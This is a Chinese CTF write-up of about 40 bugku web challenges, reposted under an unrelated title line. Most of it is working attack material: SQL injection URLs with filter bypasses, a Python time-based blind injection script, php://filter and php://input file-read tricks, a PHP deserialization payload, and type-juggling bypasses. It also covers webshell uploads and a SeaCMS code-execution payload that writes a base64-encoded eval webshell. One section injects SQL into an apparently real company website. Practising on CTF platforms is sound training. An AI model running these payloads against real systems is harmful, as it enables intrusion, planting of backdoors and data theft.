快乐的山歌

mysql %3c%3e语句优化_CTF从入门到成仙，40道bugku Write Up，看完还有什么操作搞不定！ ......

CTF从入门到成仙，40道bugku Write Up，看完还有什么操作搞不定！

本文原创作者：Passerby2，本文属i春秋原创奖励计划，未经许可禁止转载！

前言

之前刷过的bugku，这次把之前的解题思路过程都总结到一起了，差不多有40道吧应该算比较全了。

[zxsq-anti-bbcode-报错][zxsq-anti-bbcode-1]

题目说：访问参数为：?id=x不允许包含“--”，空格，单引号，双引号，“union”关键字，

查询文件中包含“”(双引号)里面的内容，需要查询的文件路径为：/var/test/key_1.php

针对上述过滤，我们可以采用如下办法绕过：

空格：/**/

--：用#

union: uni%00on

引号：hex编码

下面就可以开心的玩耍了~

爆库:

http://103.238.227.13:10088/id=0x3122/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x3a(select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/0,1),floor(rand()*2),0x3a,0x3a/**/)name/**/from/**/information_schema.tables/**/group/**/by/**/name)/**/b)/**/#

发现第二个数据库：sql41

不过flag并不在这，他让我们查询文件路径。

参考这篇[zxsq-anti-bbcode-文章][zxsq-anti-bbcode-2]总结的12个错方式

floor报错怎么也读不出文件，于是试了一下extractvalue报错：

http://103.238.227.13:10088/?id=0x3122/**/and/**/extractvalue(1,concat(0x5c,(select/**/hex(load_file(0x2f7661722f746573742f6b65795f312e706870)))))/**/#

这里得把load_file()整个函数给hex编码，不然不知道为啥，不出数据

读出flag：

不过,这只是其中的一节，我们还得想办法弄到后面的字符，这里采用substr()：

http://103.238.227.13:10088/?id=0x3122/**/and/**/extractvalue(1,concat(0x5c,(select/**/concat(0x5c,substr((load_file(0x2f7661722f746573742f6b65795f312e706870)),100,30),0x5c)),0x5c))/**/#

截断几次后可以看到flag：

这题真坑啊，要用中文的两个右双引号包裹才能成功交上去...

Flag:”7249f5a7fd1de602b30e6f39aea6193a”

题示信息：

flag格式：flag{xxxxxxxxxxxx}

不如写个Python吧

error_reporting(0);

function getIp(){

$ip = '';

if(isset($_SERVER[zxsq-anti-bbcode-'HTTP_X_FORWARDED_FOR'])){

$ip = $_SERVER[zxsq-anti-bbcode-'HTTP_X_FORWARDED_FOR'];

}else{

$ip = $_SERVER[zxsq-anti-bbcode-'REMOTE_ADDR'];

}

$ip_arr = explode(',', $ip);

return $ip_arr[zxsq-anti-bbcode-0];

}

$host="localhost";

$user="";

$pass="";

$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();

echo 'your ip is :'.$ip;

$sql="insert into client_ip (ip) values ('$ip')";

mysql_query($sql);

根据题示信息可以知道：只有插入。没有输出，可以用时间盲注。

时间盲注就是在之后返回的内容相同，没法进行判断的时候；

在mysql数据库中插入sleep()函数，如果()语句能正确执行的话，&&就不会短路，sleep()可以执行，这样响应时间就会增大；而()发生错误没有返回结果时，&&会把sleep()函数短路无法执行；

伪造请求头：

X-Forwarded-For: 1' and sleep(5) and '1' = '1

注意不能用来括号闭合！！

脚本如下: 当初想的是自动化脱裤...代码有点简陋，需要完善的地方还是挺多的。

# encoding:utf-8

import requests,time,string

characters = string.ascii_letters + string.digits + string.punctuation

max_length = 50

target = 'http://120.24.86.145:8002/web15/'

cur_database = "'+(select case when (substring((select database() ) from {0} for 1)='{1}') " \

"then sleep(4) else 1 end) and '1'='1"

# 猜解字母

def get(payload):

flag = ''

for i in range(1, max_length): # i 表示了所要查找的名字的最大长度

next_position = False

for char in characters: # 0x80=128 , 0x20=32, 32-128为可显示的字符的区间

payload_ = payload.format(str(i), char)

headers = {

'X-Forwarded-For': payload_

}

try:

r = requests.get(target,headers=headers,timeout=4)

except requests.exceptions.ReadTimeout:

flag += char

print(flag)

next_position = True

break

if not next_position:

return flag

# 指定数据库，获取其下全部表名

def get_table(database):

for i in range(0,5):

print("正在查询数据库" + database + "中的表")

payload = "'+(select case when (substring((" \

"select table_name from information_schema.tables where table_schema='"+ database + "' limit 1 offset "+ str(i) +") " \

"from {0} for 1)='{1}') " \

"then sleep(4) else 1 end) and '1'='1"

table = get(payload)

print( "数据库" + database + "的第"+ str(i+1) +"个表"+table)

get_col(table)

if not table:

print('数据库'+database+'中的表查询完毕')

break

# 查字段

def get_col(table):

for i in range(0,5):

print("正在查询表" + table + "中的字段")

payload = "'+(select case when (substring((" \

"select column_name from information_schema.columns where table_name='"+ table +"' limit 1 offset "+ str(i) +") " \

"from {0} for 1)='{1}') " \

"then sleep(4) else 1 end) and '1'='1"

column = get(payload)

print("表" + table + "的第" + str(i+1) + "个字段为" + column )

# print(column)

if not column:

print("表" + table + "中的字段查询完毕")

break

# # 作为单独的模块使用吧,获取字段详细信息

# def result(column,table):

# payload = "'+(select case when (substring((select "+column+" from "+table+") from {0} for 1)='{1}') " \

# "then sleep(4) else 1 end) and '1'='1"

# print(get(payload))

# a = 'flag'

# result(a,a)

if __name__ == "__main__":

database1 = get(cur_database)

table1 = get_table(database1)

最后使用上面被注释掉的那个模块，

获取flag：flag{cdbf14c9551d5be5612f7bb5d2867853}

题示信息： hint：全都tm过滤了绝望吗？提示 !,!=,=,+,-,^,%

这题当时我用brup爆破被过滤的字符也注了很久，sqlmap也跑了就是跑不出

上面长度370的是都被过滤了的。

后来还是放弃了，去看了下wp，发现还是我太天真了，是.DS_Store源码泄露题。

.DS_Store文件泄露利用简介

DS_Store是Mac下Finder用来保存如何展示文件/文件夹的数据文件，每个文件夹下对应一个。

如果开发人员将.DS_Store上传部署到线上环境，可能造成文件目录结构泄露，特别是备份文件、源代码文件

.DS_Store文件泄露利用

这里使用[zxsq-anti-bbcode-ds_store_exp][zxsq-anti-bbcode-5]脚本利用。

python ds_store_exp.py 120.24.86.145:8007/web2/.DS_Store

效果：

当然在这之前需要：

使用工具[zxsq-anti-bbcode-nikto][zxsq-anti-bbcode-6]对该网页进行扫描，可以发现/web2/子目录下有.DS_Store文件泄露的漏洞

这里推荐一个CTF中常见的源码泄露利用工具，其实就是一个爆破字典

拿到一个index.php.bak

/**

* Created by PhpStorm.

* User: Norse

* Date: 2017/8/6

* Time: 20:22

include_once "flag.php";

ini_set("display_errors", 0);

$str = strstr($_SERVER[zxsq-anti-bbcode-'REQUEST_URI'], '?');

$str = substr($str,1);

$str = str_replace('key','',$str);

parse_str($str);

echo md5($key1);

echo md5($key2);

if(md5($key1) == md5($key2) && $key1 !== $key2){

echo $flag."取得flag";

}

弱类型数组绕过：

http://120.24.86.145:8002/web16/index.php?kekeyy1[zxsq-anti-bbcode-]=0&kkeyey2[]=a

Flag:Bugku{OH_YOU_FIND_MY_MOMY}

文件上传题：

初步认定，黑名单+content-type验证，上传.htaccess可以成功但是会被改名

图片马也上了，没地方包含...

感觉题目有点奇怪。。看了wp之后改的是表单提交的Content-Type: MUltipart/form-data 进行大小写绕过....

看源码：文件上传，传了个过滤了，但是

传了个一句话木马

菜刀连不上，试试命令执行。

看到flag

SKCTF{uP104D_1nclud3_426fh8_is_Fun}

burp抓包分析，有回显的盲注，改一下上面那个脚本就行，这里直接导出数据包直接跑sqlmap

SQLmap.py -r "path" -p admin_name --dbs

# encoding:utf-8

import requests,re

line = 1

while line < 100:

url = 'http://120.24.86.145:8002/web11/index.php?line='+str(line) +'&filename=aW5kZXgucGhw'

s = requests.session()

responce = s.get(url)

print(responce.text)

line = line + 1

源码如下：

error_reporting(0);

$file=base64_decode(isset($_GET[zxsq-anti-bbcode-'filename'])?$_GET[zxsq-anti-bbcode-'filename']:"");

$line=isset($_GET[zxsq-anti-bbcode-'line'])?intval($_GET[zxsq-anti-bbcode-'line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

if(isset($_COOKIE[zxsq-anti-bbcode-'margin']) && $_COOKIE[zxsq-anti-bbcode-'margin']=='margin'){

$file_list[zxsq-anti-bbcode-2]='keys.php';

}

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[zxsq-anti-bbcode-$line];

}

伪造cookie ：margin=margin 访问：/web11/index.php?line=&filename=a2V5cy5waHA 其中a2V5cy5waHA 是keys.php base64加密后的

得到flag：

点一点链接，url变成了：

http://120.24.86.145:8005/post/index.php?file=show.php

这样应该就是php，包含了我们get输入的file参数。

问题是他说flag在index.php，我怎么样都读不出。

后来想到文件包含里面可以用PHP的filter来读php文件(不需要allow_url_include)：

file=php://filter/read=convert.base64-encode/resource=./index.php

base64解密后：

Bugku-ctf

error_reporting(0);

if(!$_GET[zxsq-anti-bbcode-file]){echo 'click me? no';}

$file=$_GET[zxsq-anti-bbcode-'file'];

if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

echo "Oh no!";

exit();

}

include($file);

//flag:flag{edulcni_elif_lacol_si_siht}

flag{edulcni_elif_lacol_si_siht}

看源码：1p.html

被跳转了，View-source: 看源码

得到：

解码后：

var Words =" ";

if(!$_GET[zxsq-anti-bbcode-'id'])

{

header('Location: hello.php?id=1');

exit();

}

$id=$_GET[zxsq-anti-bbcode-'id'];

$a=$_GET[zxsq-anti-bbcode-'a'];

$b=$_GET[zxsq-anti-bbcode-'b'];

if(stripos($a,'.')) //不区分大小写的，返回第一个.的位置这里不能有“.”

{

echo 'no no no no no no no';

return ;

}

$data = @file_get_contents($a,'r'); //加上@屏蔽错误信息

if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

{

require("f4l2a3g.txt");

}

else

{

print "never never never give up !!!";

}

function OutWord()

{

var NewWords;

NewWords = unescape(Words);

document.write(NewWords);

}

OutWord();

// -->

关键的一段需要绕过的地方：

if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

eregi有%00截断的漏洞，$data参数在前面配合file_get_contents()函数，我们可以php://input传入：

payload:

hello.php?id=%00&a=php://input&b=%0012345

post_data：bugku is a nice plateform!

flag{tHis_iS_THe_fLaG}

// Checking whether a user with the same username exists

$username = mysql_real_escape_string($_GET[zxsq-anti-bbcode-'username']);

$password = mysql_real_escape_string($_GET[zxsq-anti-bbcode-'password']);

$query = "SELECT *

FROM users

WHERE username='$username'";

$res = mysql_query($query, $database);

if($res) {

if(mysql_num_rows($res) > 0) {

// User exists, exit gracefully

}

else {

// If not, only then insert a new entry

$query = "INSERT INTO users(username, password)

VALUES ('$username','$password')";

}

验证登录信息的页面：

$username = mysql_real_escape_string($_GET[zxsq-anti-bbcode-'username']);

$password = mysql_real_escape_string($_GET[zxsq-anti-bbcode-'password']);

$query = "SELECT username FROM users

WHERE username='$username'

AND password='$password' ";

$res = mysql_query($query, $database);

if($res) {

if(mysql_num_rows($res) > 0){

$row = mysql_fetch_assoc($res);

return $row[zxsq-anti-bbcode-'username'];

}

return Null;

原理：

这里这行select语句：SELECT FROM users WHERE username='vampire ';

和这句的效果是一样的：SELECT FROM users WHERE username='vampire';

SQL执行字符串处理时，字符串末尾的空格会被去除。

在insert查询中，SQL会根据varchar(n)来限制字符串的最大长度，也就是说大于n的话就只取前n个字符。

下面如果我们用"admin 1"和随便一个密码来注册一个号子，对于注册界面的select语句，它并没有查到数据库中有该用户，所以成功绕过，运行到后面的insert语句的时候，只会插入前n个字符，所以当空格足够多的时候，相当于插入了一个"admin "

接下来到登录的页面，用admin和之前随便输入的密码进行登录的时候，搜索该用户名SELECT查询都将返回第一个数据记录。这样的话就可以使用原始用户身份登录。

防御办法：将名字那列加上UNIQUE约束，使之不能插入另一条记录，检测到两个相同的字符串，并insert查询失败。

flag: SKCTF{4Dm1n_HaV3_GreAt_p0w3R}

题示信息：txt？？？？

extract($_GET);

if (!empty($ac))

{

$f = trim(file_get_contents($fn));

if ($ac === $f)

{

echo "

This is flag:" ." $flag

}

else

{

echo "

sorry!

}

extract($_GET)注册变量

绕过办法：ac=aa&f=php://input

data=aa

后来还知道访问flag.txt后出现flags (个人觉得，这种方法纯属取巧，很难知道目录下有flag.txt文件的)

http://120.24.86.145:8002/web8/?ac=flags&fn=flag.txt

其实不难发现，上面几个题都出现了file_get_contents函数，而且都和php伪协议有关，这意味着，以后碰到这个函数可以多往这个方面想想

查看源码：

you are not the number of bugku !

既然要用伪协议传入welcome to the bugkuctf，那么就可以用php://filter/convert.base64-encode/resource=hint.php读出hint.php(直接读是读不出来的)

得到：

PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==

base64解码后：

class Flag{//flag.php

public $file;

public function __tostring(){

if(isset($this->file)){

echo file_get_contents($this->file);

echo "
";

return ("good");

}

__tostring：字符操作时触发()。

用这种伪协议读文件的方法的时候：一定要想着多看几个文件,像index.php(robots.txt) 不能漏

http://120.24.86.145:8006/test1/txt=php://input&file=php://filter/convert.base64-encode/resource=index.php&password=123

$txt = $_GET[zxsq-anti-bbcode-"txt"];

$file = $_GET[zxsq-anti-bbcode-"file"];

$password = $_GET[zxsq-anti-bbcode-"password"];

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){

echo "hello friend!
";

if(preg_match("/flag/",$file)){

echo "不能现在就给你flag哦";

exit();

}else{

include($file);

$password = unserialize($password);

echo $password;

}

}else{

echo "you are not the number of bugku ! ";

}

echo $password 会触发__tostring

所以file参数写包含hint.php，txt还是之前的伪协议不变，password就

用以下脚本传入flag.php，序列化的数据

class Flag

{

public $file = 'Flag.php';

public function __tostring()

{

if (isset($this->file)) {

echo file_get_contents($this->file);

echo "
";

return ("good");

}

$a = new Flag();

echo serialize($a);

password = O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

payload:

http://120.24.86.145:8006/test1/?txt=php://input&file=php://filter/convert.base64-encode/resource=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

data：welcome to the bugkuctf

拿到flag

flag{php_is_the_best_language}

题目源码：

include "flag.php";

$a = @$_REQUEST[zxsq-anti-bbcode-'hello'];

eval( "var_dump($a);");

show_source(__FILE__);

使用?hello=file('flag.php')

或者?hello=show_source('flag.php') 等可以读取源码的函数

或者构造var_dump($a) 闭合

过滤了--+，

已判断字段4个

id=-2' union select 1,2,3,database() #

查出数据库：skctf_flag

id=-2' union select 1,2,3,table_name from information_schema.tables where table_schema='skctf_flag' #

查出表：fl4g

id=-2' union select 1,2,3,column_name from information_schema.columns where table_name='fl4g' #

查出字段skctf_flag

id=-2' union select 1,2,skctf_flag,4 from skctf_flag.fl4g #

查出flag：BUGKU{Sql_INJECT0N_4813drd8hz4}

源码：

highlight_file('flag.php');

$_GET[zxsq-anti-bbcode-'id'] = urldecode($_GET[zxsq-anti-bbcode-'id']);

$flag = 'flag{xxxxxxxxxxxxxxxxxx}';

if (isset($_GET[zxsq-anti-bbcode-'uname']) and isset($_POST[zxsq-anti-bbcode-'passwd'])) {

if ($_GET[zxsq-anti-bbcode-'uname'] == $_POST[zxsq-anti-bbcode-'passwd'])

print 'passwd can not be uname.';

else if (sha1($_GET[zxsq-anti-bbcode-'uname']) === sha1($_POST[zxsq-anti-bbcode-'passwd'])&($_GET[zxsq-anti-bbcode-'id']=='margin'))

die('Flag: '.$flag);

else

print 'sorry!';

}

两个不相等的值，但sha1相等：一样用数组绕过即可获得flag

题示信息：送给大家一个过狗一句话

http://120.24.86.145:8010/index.php?s=phpinfo() 执行成功

但是菜刀连不上，估计是限制了权限。

试了n久之后，看了wp

用的print_r(glob('*.php'));读取敏感文件

Array ( [zxsq-anti-bbcode-0] => 2.php [zxsq-anti-bbcode-1] => 3.php [zxsq-anti-bbcode-2] => 4.php [zxsq-anti-bbcode-3] => 5.php [zxsq-anti-bbcode-4] => a.php [zxsq-anti-bbcode-5] => c.php [zxsq-anti-bbcode-6] => chaoba1.php [zxsq-anti-bbcode-7] => chaoba2.php [zxsq-anti-bbcode-8] => ddee.php [zxsq-anti-bbcode-9] => f.php [zxsq-anti-bbcode-10] => h.php [zxsq-anti-bbcode-11] => haha.php [zxsq-anti-bbcode-12] => index.php [zxsq-anti-bbcode-13] => ll.php [zxsq-anti-bbcode-14] => oudeniu.php [zxsq-anti-bbcode-15] => phpspy1.php [zxsq-anti-bbcode-16] => q.php [zxsq-anti-bbcode-17] => t2.php [zxsq-anti-bbcode-18] => txxxc.php [zxsq-anti-bbcode-19] => x.php [zxsq-anti-bbcode-20] => xxoo.php [zxsq-anti-bbcode-21] => xxoos.php [zxsq-anti-bbcode-22] => zx.php )

尝试：print_r(glob('*.txt'))

Array ( [zxsq-anti-bbcode-0] => NewFile.txt [zxsq-anti-bbcode-1] => a.txt [zxsq-anti-bbcode-2] => flag.txt [zxsq-anti-bbcode-3] => testfile.txt )

尝试：print_r(file("./flag.txt"))

Array ( [zxsq-anti-bbcode-0] => BUGKU{bugku_web_009801_a} )

if(isset($_GET[zxsq-anti-bbcode-'v1']) && isset($_GET[zxsq-anti-bbcode-'v2']) && isset($_GET[zxsq-anti-bbcode-'v3'])){

$v1 = $_GET[zxsq-anti-bbcode-'v1'];

$v2 = $_GET[zxsq-anti-bbcode-'v2'];

$v3 = $_GET[zxsq-anti-bbcode-'v3'];

if($v1 != $v2 && md5($v1) == md5($v2)){

if(!strcmp($v3, $flag)){

echo $flag;

}

v1和v2比：数组绕过

v3 strcmp()绕过：用数组即可

payload： http://118.89.219.210:49162/?v1[zxsq-anti-bbcode-]=123&v2[]=ads&v3[]=123

flag：SKCTF{Php_1s_tH3_B3St_L4NgUag3}

算术题，刷新一次变一次，多刷新几次会发现：

让我们把答案在2秒内以value为参数post上去：

# encoding:utf-8

import requests,re

url = 'http://120.24.86.145:8002/qiumingshan/'

s = requests.Session()

responce = s.get(url)

final = re.findall(r'

(.+?)=',responce.text)

result = eval(final[zxsq-anti-bbcode-0])

data = {

"value": str(result)

}

responce2 = s.post(url,data=data)

print(responce2.text)

这里有个坑：一定要开session，不然他会以为你是不同电脑发来的

抓到返回headers 里面有base64加密的flag

base64解密后，发现flag部分还有一次base64

# encoding:utf-8

import requests,base64,re

url = 'http://120.24.86.145:8002/web6/'

s = requests.session()

responce = s.get(url)

f = responce.headers[zxsq-anti-bbcode-'flag']

f = base64.b64decode(f)

print(f)

flag = re.findall(r':(.+?)\'',str(f))[zxsq-anti-bbcode-0].strip()

data = {

'margin': base64.b64decode(flag)

}

print(flag)

responce2 = s.post(url,data=data)

print(responce2.text)

一想到这种题肯定考二次，但是扫了一下目录得到show.php，访问就拿到flag了。这个题没找到回显的点，不知道这个题是考察什么...

源码

$flag='xxx';

extract($_GET);

if(isset($shiyan))

{

$content=trim(file_get_contents($flag));

if($shiyan==$content)

{

echo'flag{xxx}';

}

else

{

echo'Oh.no';

}

解法1：

http://120.24.86.145:9009/1.php?shiyan=123&flag=php://input

post_data:123

解法2

http://120.24.86.145:9009/1.php?shiyan=&flag=

flag{bugku-dmsj-p2sm3N}

但是为什么赋1就不相等呢？

http://120.24.86.145:9009/1.php?shiyan=1&flag=1

后来在本地测了一下，因为file_get_contents($flag)始终是包含不到文件的，所以会返回一个空，此时只有当shiyan参数也为空才能相等。

demo:

$flag='123';

extract($_GET);

if(isset($shiyan))

{

$content=trim(file_get_contents($flag1));

if($shiyan==$content)

{

echo 'bingo';

echo '
';

var_dump($flag);

echo '
';

var_dump($content);

echo '
';

var_dump($shiyan);

}

else

{

var_dump($flag.'
');

var_dump($content.'
');

var_dump($shiyan.'
');

echo'Oh.no';

}

$flag = "flag{xxxxx}";

if (isset($_GET[zxsq-anti-bbcode-'a'])) {

if (strcmp($_GET[zxsq-anti-bbcode-'a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0；如果 str1大于 str2返回 > 0；如果两者相等，返回 0。

//比较两个字符串(区分大小写)

die('Flag: '.$flag);

else

print 'No';

}

数组绕过：

http://120.24.86.145:9009/6.php?a[]=1

Flag: flag{bugku_dmsj_912k}

if(eregi("hackerDJ",$_GET[zxsq-anti-bbcode-id])) {

echo("

not allowed!

");

exit();

}

$_GET[zxsq-anti-bbcode-id] = urldecode($_GET[zxsq-anti-bbcode-id]);

if($_GET[zxsq-anti-bbcode-id] == "hackerDJ")

{

echo "

Access granted!

echo "

flag

}

因为浏览器解析一次php解析一次，所以要两次编码：

http://120.24.86.145:9009/10.php?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61

flag{bugku__daimasj-1t2}

$flag = "flag";

if (isset ($_GET[zxsq-anti-bbcode-'password'])) {

if (ereg ("^[zxsq-anti-bbcode-a-zA-Z0-9]+$", $_GET[zxsq-anti-bbcode-'password']) === FALSE)

echo 'You password must be alphanumeric';

else if (strpos ($_GET[zxsq-anti-bbcode-'password'], '--') !== FALSE)

die('Flag: ' . $flag);

else

echo 'Invalid password';

}

ereg()函数匹配数组的时候会返回null，所以：

http://120.24.86.145:9009/19.php?password[]=1--

flag{ctf-bugku-ad-2131212}

题示源码：

$temp = $_GET[zxsq-anti-bbcode-'password'];

is_numeric($temp)?die("no numeric"):NULL;

if($temp>1336){

echo $flag;

要求我们传入的password参数不能为数字，且要大于1336。

我们可以在本地测试一下，is_numeric()函数可以被数组绕过，而且该数组可以和数字进行大小比较：

$temp = $_POST[zxsq-anti-bbcode-'passer6y'];

if(is_numeric($temp)) {

echo "is num
";

var_dump($temp);

}

else{

echo "is not num
";

var_dump($temp);

if($temp > 10){

echo "
\$temp > 10";

}

所以我们可以，构造payload：

http://120.24.86.145:9009/22.php?password[]=asdsadsadasd

得到flag：flag{bugku_null_numeric}

$flag = "flag";

if (isset($_GET[zxsq-anti-bbcode-'name']) and isset($_GET[zxsq-anti-bbcode-'password']))

{

var_dump($_GET[zxsq-anti-bbcode-'name']);

echo "";

var_dump($_GET[zxsq-anti-bbcode-'password']);

var_dump(sha1($_GET[zxsq-anti-bbcode-'name']));

var_dump(sha1($_GET[zxsq-anti-bbcode-'password']));

if ($_GET[zxsq-anti-bbcode-'name'] == $_GET[zxsq-anti-bbcode-'password'])

echo 'Your password can not be your name!';

else if (sha1($_GET[zxsq-anti-bbcode-'name']) === sha1($_GET[zxsq-anti-bbcode-'password']))

die('Flag: '.$flag);

else

echo 'invalid password';

}

else

echo 'ogin first!';

这个题目要求我们传入name和password参数不相等，但他们的sha1()加密后相等

我们可以本地测试一下如果sha1()函数加密一个数组返回的会是怎样：

$a = $_POST[zxsq-anti-bbcode-'passer6y'];

var_dump(sha1($a));

会发出一个警告，说sha1()希望参数是string类型，但如果我们传入一个数组类型，返回的是NULL，因此此题我们可以构造payload：

http://120.24.86.145:9009/7.php?name[zxsq-anti-bbcode-]=123&password[]=a

得到：flag{bugku--daimasj-a2}

ps：sha1()和md5()处理数组的返回都是Null，所以都可以用数组来绕过

题示源码：

error_reporting(0);

function noother_says_correct($temp)

{

$flag = 'flag{test}';

$one = ord('1'); //ord — 返回字符的 ASCII 码值

$nine = ord('9'); //ord — 返回字符的 ASCII 码值

$number = '3735929054';

// Check all the input characters!

for ($i = 0; $i < strlen($number); $i++)

{

// Disallow all the digits!

$digit = ord($temp{$i});

if ( ($digit >= $one) && ($digit <= $nine) )

{

// Aha, digit not allowed!

return "flase";

}

if($number == $temp)

return $flag;

}

$temp = $_GET[zxsq-anti-bbcode-'password'];

echo noother_says_correct($temp);

这个题的意思就是说，不能输入1-9的数字，但是最后结果是要和 '3735929054'相等，

很容易想到用16进制绕过。

payload：

http://120.24.86.145:9009/20.php?password=0xDEADC0DE

题示源码：

$flag = "xxx";

if (isset ($_GET[zxsq-anti-bbcode-'password']))

{

if (ereg ("^[zxsq-anti-bbcode-a-zA-Z0-9]+$", $_GET[zxsq-anti-bbcode-'password']) === FALSE)

{

echo 'You password must be alphanumeri';

}

else if (strlen($_GET[zxsq-anti-bbcode-'password']) < 8 && $_GET[zxsq-anti-bbcode-'password'] > 9999999)

{

if (strpos ($_GET[zxsq-anti-bbcode-'password'], '-') !== FALSE) //strpos — 查找字符串首次出现的位置

{

die('Flag: ' . $flag);

}

else

{

echo('- have not been found');

}

else

{

echo ’Invalid password';

}

这个题要求我们传入的password变量，绕过ereg()变量，长度小于8且数值大于9999999，还要有"-"符号。

我们可以用%00来绕过ereg()变量，用数组绕过strlen()来限制我们的数字位数,paylaod如下

http://120.24.86.145:9009/5.php?password[]=%00999999999-

get flag：flag{bugku-dm-sj-a12JH8}

我在本地测数组绕过strlen()的长度限制,不论我传入的数组是什么值，都显示长度为5：

$a = $_POST[zxsq-anti-bbcode-'passer6y'];

var_dump(strlen($a));

题示源码：

$flag = "flag";

if (isset ($_GET[zxsq-anti-bbcode-'ctf'])) {

if (@ereg ("^[zxsq-anti-bbcode-1-9]+$", $_GET[zxsq-anti-bbcode-'ctf']) === FALSE)

echo '必须输入数字才行';

else if (strpos ($_GET[zxsq-anti-bbcode-'ctf'], '#biubiubiu') !== FALSE)

die('Flag: '.$flag);

else

echo '骚年，继续努力吧啊~';

}

strpos()函数和ereg()函数一样也具有数组绕过漏洞

paylaod:

http://120.24.86.145:9009/15.php?ctf[]=123asd

题示源码：

error_reporting(0);

$flag = 'flag{test}';

if ("POST" == $_SERVER[zxsq-anti-bbcode-'REQUEST_METHOD'])

{

$password = $_POST[zxsq-anti-bbcode-'password'];

if (0 >= preg_match('/^[zxsq-anti-bbcode-[:graph:]]{12,}$/', $password)) //preg_match — 执行一个正则表达式匹配

{

echo 'flag';

exit;

}

while (TRUE)

{

$reg = '/([zxsq-anti-bbcode-[:punct:]]+|[zxsq-anti-bbcode-[:digit:]]+|[zxsq-anti-bbcode-[:upper:]]+|[zxsq-anti-bbcode-[:lower:]]+)/';

if (6 > preg_match_all($reg, $password, $arr))

break;

$c = 0;

$ps = array('punct', 'digit', 'upper', 'lower'); //[zxsq-anti-bbcode-[:punct:]] 任何标点符号 [zxsq-anti-bbcode-[:digit:]] 任何数字 [zxsq-anti-bbcode-[:upper:]] 任何大写字母 [zxsq-anti-bbcode-[:lower:]] 任何小写字母

foreach ($ps as $pt)

{

if (preg_match("/[zxsq-anti-bbcode-[:$pt:]]+/", $password))

$c += 1;

}

if ($c < 3) break;

//>=3，必须包含四种类型三种与三种以上

if ("42" == $password) echo $flag;

else echo 'Wrong password';

exit;

}

从第7行代码我们可以知道，除了空白字符和制表符外不能超过12个字符，还有第9行那个

echo 'flag';

这个是个字符串flag，真正的flag在26行处。

第15行处，

$reg = '/([zxsq-anti-bbcode-[:punct:]]+|[zxsq-anti-bbcode-[:digit:]]+|[zxsq-anti-bbcode-[:upper:]]+|[zxsq-anti-bbcode-[:lower:]]+)/';

if (6 > preg_match_all($reg, $password, $arr))

要求我们传入的参数中，标点，数字，大写小写字母被匹配的次数大于6。

foreach ($ps as $pt)

{

if (preg_match("/[zxsq-anti-bbcode-[:$pt:]]+/", $password))

$c += 1;

}

if ($c < 3) break;

if ("42" == $password) echo $flag;

同时要求我们包含这几种类型至少三种以上，且使password参数和42相等

payload:

password=42.00e+0000000000

flag{Bugku_preg_match}

提示信息：点了login咋没反应，提示：hint

这题有毒，提示hint，竟然是以hint为参数，随便传入一个值即可获得源码：

error_reporting(0);

include_once("flag.php");

$cookie = $_COOKIE[zxsq-anti-bbcode-'ISecer'];

if(isset($_GET[zxsq-anti-bbcode-'hint'])){

show_source(__FILE__);

}

elseif (unserialize($cookie) === "$KEY")

{

echo "$flag";

}

else {

}

$KEY='ISecer:www.isecer.com';

一开始，我把反序列化数据,然后按照

s:21:"ISecer:www.isecer.com";

![zxsq-anti-bbcode-Alt text](https://i.loli.net/2018/06/17/5b26122f446fb.png)

传了上去，感觉智商再次被侮辱..这个$key变量的值是后面才传入的，所以我们应该传个空的反序列化数据：

![zxsq-anti-bbcode-Alt text](https://i.loli.net/2018/06/17/5b261218a6a9c.png)

## 实战2-

打开页面，既然题目说了，那就找，点了一遍，发现一个http://www.kabelindo.co.id/readnews.php?id=18

顺手一个单引号，诶报错了,那就来

表名出来了，flag{tbnomax}

## Bugku-cms1

打开页面，往下一拉，Powered by SongCMS v3.13 免费版

日常扫目录，发现一个/data/，打开一看有个sql文件，里面有两个账号密码，分别试了一下，进了后台，找下上传文件的地方

![zxsq-anti-bbcode-CukCtJ.jpg](https://s1.ax1x.com/2018/04/18/CukCtJ.jpg)

![zxsq-anti-bbcode-CukA6x.jpg](https://s1.ax1x.com/2018/04/18/CukA6x.jpg)

然后上传成功，菜刀一连，flag就在根目录下

## phpcmsV9

照着漏洞来就行了

http://www.freebuf.com/vuls/131648.html

## 海洋cms

个人觉得，这些题考察exp快速搜索能力

参考：https://blog.csdn.net/qq_35078631/article/details/76595817

http://120.24.86.145:8008/search.php?searchtype=5

searchword=d&order=}{end if}{if:1)print_r($_POSTfunc);//}{end if}&func=assert&

cmd=fwrite(fopen("pass.php","w"),base64_decode(PD9waHAgZXZhbCgkX1BPU1Rbc3d4XSk7Pz4))

然后菜刀连接：

![](https://i.imgur.com/le864xM.png)

## bugku导航

稍微浏览了一下基本页面，顺手吧目录扫描器开启，发现两个登录的地方：

一个是首页用户登录的，放进sqlmap跑了一下，无果。

还有一个地方是后台登录的页面:http://120.24.86.145:9006/admin/login.php#

post，burpsuite抓了个包保存到本地，试了一下username参数

